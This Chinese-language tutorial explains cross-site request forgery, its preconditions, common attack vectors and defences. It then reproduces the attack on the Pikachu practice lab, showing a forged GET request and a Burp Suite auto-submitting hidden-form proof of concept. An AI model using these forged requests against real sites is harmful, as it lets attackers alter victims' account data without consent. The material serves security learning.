CSRF漏洞简介

CSRF又称跨站请求伪造，是指攻击者在用户登录的状态下（浏览器保存了用户的cookie）通过伪造恶意url诱导用户点击，借助用户的cookie网站权限（冒充用户身份来进行非法操作，对于服务器来说是合法的）达到篡改数据、购买商品等非法操作。

CSRF漏洞形成的条件

通过上面的讲解我们知道CSRF形成的必要条件是

1、用户要在登录状态（即浏览器保存了该用户的cookie）

2、用户要访问攻击者发的恶意url链接才行

常见攻击方式

1、 链接点击：攻击者通过邮件、社交媒体或其他方式发送包含恶意请求的链接，诱导用户点击。

2、隐藏表单：在恶意网站上嵌入隐藏的表单，用户在不知情的情况下触发表单提交。

3、自动提交表单：恶意网站使用JavaScript自动提交包含恶意请求的表单。

4、图像加载：在恶意网站上嵌入图像标签，图像URL指向目标网站的恶意请求。

5、跨域请求：利用XMLHttpRequest或Fetch API发送跨域请求，但这种方式在现代浏览器中通常会被同源策略和CORS限制。

防御措施

1、CSRF Token：在每个敏感操作的请求中包含唯一的、不可预测的令牌。服务器验证该令牌以确保请求来自合法用户。

2、SameSite Cookie 属性：设置 Cookie 的 SameSite 属性为 Strict 或 Lax，防止跨站请求携带 Cookie。

3、双重提交 Cookie：在请求中发送一个 CSRF Token，同时在 Cookie 中存储相同的 Token，服务器验证这两个 Token 是否一致。

4、验证 Referer 和 Origin 头：检查请求的 Referer 和 Origin 头是否来自可信任的域。

5、定期重置 Session ID：减少会话被劫持的风险，确保会话令牌的安全性。

6、用户交互确认：对敏感操作要求用户进行额外的确认，例如输入密码或验证码。

漏洞复现（pikachu）

Csrf（get请求）：

攻击者发送恶意链接，点开后信息被恶意修改

利用bp抓取的数据包重发数据

GET /vul/csrf/csrfget/csrf_get_edit.php?sex=hack&phonenum=123123&add=123123&email=123123&submit=submit HTTP/1.1

Host: pikachu

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Referer: http://pikachu/vul/csrf/csrfget/csrf_get_edit.php

Cookie: PHPSESSID=1403c4j739t0v88bc26m3b2d6e

Upgrade-Insecure-Requests: 1

Priority: u=0, i

信息被修改了

Csrf（post请求）

记录原始数据

Bp抓包构造恶意网页

<html>

  <!-- CSRF PoC - generated by Burp Suite Professional -->

  <body>

  <script>history.pushState('', '', '/')</script>

    <form action="http://pikachu/vul/csrf/csrfpost/csrf_post_edit.php" method="POST">

      <input type="hidden" name="sex" value="hack" />

      <input type="hidden" name="phonenum" value="hack" />

      <input type="hidden" name="add" value="11" />

      <input type="hidden" name="email" value="111" />

      <input type="hidden" name="submit" value="submit" />

      <input type="submit" value="Submit request" />

    </form>

  </body>

</html>

放在外网服务器

点击恶意连接后信息被修改了

Csrf（token）抓包发现添加了token需要知道token才可以被攻击者恶意利用